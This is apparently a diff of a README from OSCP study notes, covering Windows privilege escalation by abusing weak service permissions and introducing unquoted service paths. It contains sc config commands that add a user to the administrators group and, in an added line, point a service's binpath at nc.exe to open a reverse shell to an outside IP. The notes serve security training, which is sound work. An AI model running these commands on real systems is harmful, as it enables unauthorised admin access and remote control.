AbdullahZuhair21/OSCP-Notes/README.md

 12- Binary Path
 run PowerUp.ps1
-in the cmd type
--     accesschk64.exe -uwcv Everyone *
-the output shows 'RW daclsvc' this means you have read and write in the daclsvc service. look for SERVICE_CHANGE_CONFIG in the output
--     accesschk64.exe -uwcv daclsvc #get more information on the service if you find SERVICE_CHANGE_CONFIG in the daclsvc service means you can change the configuration query the service
+Get more information about the service
--     sc qc daclsvc
+-     sc qc UsoSvc   #check BINARY_PATH_NAME
-if you find BINARY_PATH_NAME in the output you can change the configuration
--     sc config daclsvc binpath* "net localgroup administrators user /add" #add the user in the administrators group
+overwrite the binpath of the service
+-     sc config <Service> binpath="C:\Users\mssql-svc\Desktop\nc.exe 10.10.16.14 9004 -e cmd.exe"
+check the binary path again
+-     sc stop <Service>     #stop the service
--     sc start daclsvc #start the service again
+-     sc start <Service>    #start it again

 13- Unquoted Service Path
 this means the service path doesn't have quotes  so what will happen is the windows will run the following path as Program.exe -> Program Files.exe -> Unqouted.exe -> Unqouted Path.exe -> Unqouted Path Service.exe.